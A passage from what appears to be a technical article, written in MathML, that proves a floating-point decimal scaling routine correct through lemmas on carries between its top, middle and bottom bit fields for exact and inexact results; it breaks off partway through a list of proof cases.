stretchy=false>⌊</mo><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><mrow><mi>m</mi><mo>+</mo><mi>b</mi></mrow></msup><mo stretchy=false>⌋</mo></mrow><mo>≠</mo><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><mrow><mi>m</mi><mo>+</mo><mi>b</mi></mrow></msup></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /><mtext>floor</mtext><mspace width='0.3em' /><mtext>and</mtext><mspace width='0.3em' /><mtext>mod]</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo stretchy=false>⌊</mo><mn>2</mn><mo>·</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo stretchy=false>⌋</mo></mrow><mo>≠</mo><mn>2</mn><mo>·</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[reusing</mtext><mspace width='0.3em' /><mtext>expansion</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mtext>above]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>Scale</mtext><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><mn>||</mn><mspace width='0.166em' /><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≠</mo><mn>0</mn><mspace width='0.3em' /><mtext>or</mtext><mspace width='0.3em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><mtext>Scale</mtext><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo stretchy=false>⌊</mo><mn>2</mn><mo>·</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo stretchy=false>⌋</mo></mrow><mspace width='0.166em' /><mn>||</mn><mspace width='0.166em' /><mrow><mo stretchy=false>⌊</mo><mn>2</mn><mo>·</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo stretchy=false>⌋</mo></mrow><mo>≠</mo><mn>2</mn><mo>·</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[applying</mtext><mspace width='0.3em' /><mtext>previous</mtext><mspace width='0.3em' /><mtext>two</mtext><mspace width='0.3em' /><mtext>expansions]</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo>⟨</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>⟩</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><mrow><mo>⟨</mo><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mo>⟩</mo></mrow><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /><mtext>scale]</mtext></mrow></mtd></mtr></mtable></math></div>
<p>
So <math><mrow><mtext>Scale</mtext><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math>. <math><mo>∎</mo></math>
</div>
<p>
Next we can establish basic conditions that make <math><mtext>Scale</mtext></math> correct.
<div class=lemma id=lemma2>
<p>
<b>Lemma 2</b>. If <math><mrow><MI>𝑡𝑜𝑝</MI><mo>=</mo><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> and <math><mrow><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo><mo>≡</mo><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo></mrow></math>,
then <math><mtext>Scale</mtext></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math>.
<p>
<i>Proof</i>. <math><mrow><mtext>Scale</mtext><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo><mo>=</mo><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo></mrow></math>,
while <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo><mo>=</mo><MI>𝑡𝑜𝑝</MI><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo></mrow></math>.
If <math><mrow><MI>𝑡𝑜𝑝</MI><mo>=</mo><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> and <math><mrow><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo><mo>≡</mo><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo></mrow></math>,
then these expressions are identical.
Since <math><mrow><mtext>Scale</mtext><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> (by <a href="#lemma1">Lemma 1</a>), so does <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math>. <math><mo>∎</mo></math>
</div>
<p>
Now we need to show that <math><mrow><MI>𝑡𝑜𝑝</MI><mo>=</mo><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> and <math><mrow><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo><mo>≡</mo><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo></mrow></math>
in all cases.
We will also show that <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math> to justify using
<math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≥</mo><mn>2</mn></mrow></math> in place of <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>0</mn></mrow></math> when that’s convenient.
<p>
Note that <math><mrow><MI>𝑝𝑚</MI><mo>=</mo><mrow><mo stretchy=false>⌈</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo stretchy=false>⌉</mo></mrow><mo>=</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>+</mo><mi>ε</mi><msub><mspace height='0em' /><mn>0</mn></msub></mrow></math> for <math><mrow><mi>ε</mi><msub><mspace height='0em' /><mn>0</mn></msub><mo>∈</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>1</mn><mo stretchy=false>)</mo></mrow></math>, and so:<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mi>x</mi><mo>·</mo><mo stretchy=false>(</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>+</mo><mi>ε</mi><msub><mspace height='0em' /><mn>0</mn></msub><mo stretchy=false>)</mo></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>+</mo><mi>ε</mi><msub><mspace height='0em' /><mn>1</mn></msub><mo>,</mo><mspace width='2em' /><mi>ε</mi><msub><mspace height='0em' /><mn>1</mn></msub><mo>=</mo><mi>x</mi><mo>·</mo><mi>ε</mi><msub><mspace height='0em' /><mn>0</mn></msub><mo>∈</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mo stretchy=false>)</mo></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><MI>𝑡𝑜𝑝</MI><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>+</mo><mi>ε</mi><msub><mspace height='0em' /><mn>1</mn></msub></mrow></mtd></mtr></mtable></math></div>
<p>
The proof analyzes the effect of the addition of <math><mrow><mi>ε</mi><msub><mspace height='0em' /><mn>1</mn></msub></mrow></math>
to the ideal result <math><mrow><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math>.
Since <math><mrow><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> is <math><mi>b</mi></math> bits and <math><mrow><mi>ε</mi><msub><mspace height='0em' /><mn>1</mn></msub></mrow></math> is at most <math><mi>b</mi></math> bits,
adding <math><mrow><mi>ε</mi><msub><mspace height='0em' /><mn>1</mn></msub><mo>></mo><mn>0</mn></mrow></math> always causes <math><mrow><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><mo>≠</mo><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math>.
(Talking about the low <math><mi>b</mi></math> bits of a real number is unusual;
we mean the low <math><mi>b</mi></math> integer bits followed by all the fractional bits: <math><mrow><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup></mrow></math>.)
<p>
The question is whether that addition overflows and propagates
a carry into <math><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI></math> or even <math><MI>𝑡𝑜𝑝</MI></math>.
There are two main cases: exact results <math><mrow><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><mn>0</mn><mo stretchy=false>)</mo></mrow></math>
and inexact results <math><mrow><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo></mrow></math>.
<a class=anchor href="#exact_results"><h2 id="exact_results">Exact Results</h2></a>
<p>
Exact results have no error, making them match <math><mrow><mtext>Scale</mtext><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> exactly.
<div class=lemma id=lemma3>
<p>
<b>Lemma 3</b>. For exact results, <math><mtext>Scale</mtext></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<p>
<i>Proof</i>. For an exact result, <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><mn>0</mn></mrow></math>,
meaning <math><mrow><mn>2</mn><mo>·</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math> is an integer
and the sticky bit is 0.
Since <math><mrow><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> is <math><mi>b</mi></math> zero bits, adding <math><mrow><mi>ε</mi><msub><mspace height='0em' /><mn>1</mn></msub></mrow></math> affects
<math><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI></math> but does not carry into <math><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI></math> or <math><MI>𝑡𝑜𝑝</MI></math>.
Therefore <math><mrow><MI>𝑡𝑜𝑝</MI><mo>=</mo><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>=</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><mn>0</mn></mrow></math>.
The latter, combined with <math><mrow><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><mn>0</mn></mrow></math>,
makes <math><mrow><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo><mo>≡</mo><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo></mrow></math> trivially true
(both sides are false).
By <a href="#lemma2">Lemma 2</a>, <math><mtext>Scale</mtext></math> is correct.
And since <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>=</mo><mn>0</mn></mrow></math>, <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<math><mo>∎</mo></math>
</div>
<a class=anchor href="#inexact_results"><h2 id="inexact_results">Inexact Results</h2></a>
<p>
Inexact results are more work.
We will reduce the correctness to a few conditions on <math><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI></math>.
<div class=lemma id=lemma4>
<p>
<b>Lemma 4.</b> For inexact results, if <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>0</mn></mrow></math>, then <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math>.
<p>
<i>Proof</i>. For an inexact result, <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≠</mo><mn>0</mn></mrow></math>.
The only possible change from <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> to <math><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI></math> is a carry
from the error addition <math><mrow><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>+</mo><mi>ε</mi><msub><mspace height='0em' /><mn>1</mn></msub></mrow></math> overflowing <math><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI></math>.
That carry is at most 1, so <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>=</mo><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>+</mo><mi>ε</mi><msub><mspace height='0em' /><mn>2</mn></msub><mo stretchy=false>)</mo><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup></mrow></math>
for <math><mrow><mi>ε</mi><msub><mspace height='0em' /><mn>2</mn></msub><mo>∈</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>1</mn><mo stretchy=false>]</mo></mrow></math>.
An overflow into <math><MI>𝑡𝑜𝑝</MI></math> leaves <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>=</mo><mn>0</mn></mrow></math>.
If <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>0</mn></mrow></math> then there can be no overflow, so <math><mrow><MI>𝑡𝑜𝑝</MI><mo>=</mo><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math>.
By <a href="#lemma2">Lemma 2</a>, <math><mtext>Scale</mtext></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math>. <math><mo>∎</mo></math>
</div>
<p>
For some cases, it will be more convenient to prove the range of <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math>
instead of the range of <math><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI></math>. For that we can use a variant of <a href="#lemma4">Lemma 4</a>.
<div class=lemma id=lemma5>
<p>
<b>Lemma 5.</b> For inexact results, if <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>∈</mo><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mo>−</mo><mn>2</mn><mo stretchy=false>]</mo></mrow></math> then <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math>.
<p>
<i>Proof</i>. If <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>∈</mo><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mo>−</mo><mn>2</mn><mo stretchy=false>]</mo></mrow></math>, then <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>+</mo><mi>ε</mi><msub><mspace height='0em' /><mn>2</mn></msub><mo>∈</mo><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mo>−</mo><mn>1</mn><mo stretchy=false>]</mo></mrow></math>,
so the <math><mtext>mod</mtext></math> in <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>=</mo><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>+</mo><mi>ε</mi><msub><mspace height='0em' /><mn>2</mn></msub><mo stretchy=false>)</mo><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup></mrow></math>
does nothing (there is no overflow and wraparound),
so <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>=</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>+</mo><mi>ε</mi><msub><mspace height='0em' /><mn>2</mn></msub><mo>≥</mo><mn>1</mn></mrow></math>.
By <a href="#lemma4">Lemma 4</a>, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math>. <math><mo>∎</mo></math>
</div>
<p>
A related lemma helps with <math><mrow><mi>m</mi><mi>i</mi><mi>d</mi><mi>d</mi><mi>l</mi><mi>e</mi><mo>≠</mo><mn>1</mn></mrow></math>.
<div class=lemma id=lemma6>
<p>
<b>Lemma 6</b>. For inexact results, if <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mo>−</mo><mn>2</mn><mo stretchy=false>]</mo></mrow></math>, then <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≥</mo><mn>2</mn></mrow></math>.
<p>
<i>Proof</i>. Again there is no overflow,
so <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≥</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≥</mo><mn>2</mn></mrow></math>.
<math><mo>∎</mo></math>
</div>
<p>
Now we need to prove either that <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mo>−</mo><mn>2</mn><mo stretchy=false>]</mo></mrow></math> or that <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>0</mn></mrow></math> for all inexact results.
We will consider four cases:
<ul>
<li>
[Small Positive Powers] <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>27</mn><mo stretchy=false>]</mo></mrow></math> and <math><mrow><mi>b</mi><mo>≤</mo><mn>64</mn></mrow></math>.
<li>
[Small Negative Powers] <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>27</mn><mo>,</mo><MO form='prefix'>−</MO><mn>1</mn><mo stretchy=false>]</mo></mrow></math> and <math><mrow><mi>b</mi><mo>≤</mo><mn>64</mn></mrow></math>.
<li>
